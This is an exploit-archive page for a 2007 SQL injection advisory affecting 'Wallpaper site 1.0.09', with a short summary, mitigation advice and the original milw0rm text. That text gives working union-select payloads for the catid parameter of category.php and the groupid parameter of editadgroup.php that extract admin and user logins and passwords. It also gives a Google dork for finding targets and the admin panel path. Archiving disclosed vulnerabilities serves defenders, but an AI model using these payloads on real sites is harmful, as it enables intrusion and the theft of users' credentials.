Wallpaper site 1.0.09

vendor:

Wallpaper site

by:

Koller

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: Wallpaper site

Affected Version From: 1.0.09

Affected Version To: 1.0.09

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The category.php and editadgroup.php files in Wallpaper site 1.0.09 are vulnerable to SQL Injection. An attacker can exploit the vulnerability by injecting SQL code in the catid parameter of category.php and the groupid parameter of editadgroup.php. This can lead to unauthorized access to sensitive information such as login credentials and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use parameterized queries to prevent SQL Injection attacks. Additionally, regular security updates should be applied to the software to patch any known vulnerabilities.

Source

Exploit-DB raw data:

#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : Wallpaper site 1.0.09
# GoogLe Dork      : Powered by EasySiteNetwork 
# Of. site         : http://www.easysitenetwork.com/
# The price        : ?
# Risk             : Average
# Found By         : Koller
# Thanks           : all members xaker.name & grabberz.com
# Vulnerable files : category.php, editadgroup.php

# Vuln : www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
#        www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/*
#
# Admin panel: www.victim.com/siteadmin/index.php
#
# Addon :) - sql-injection in editadgroup.php - www.victim.com/siteadmin/editadgroup.php?groupid=2 union select 111,222/*

# P.s. Happy New Year 8)
#
# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-22]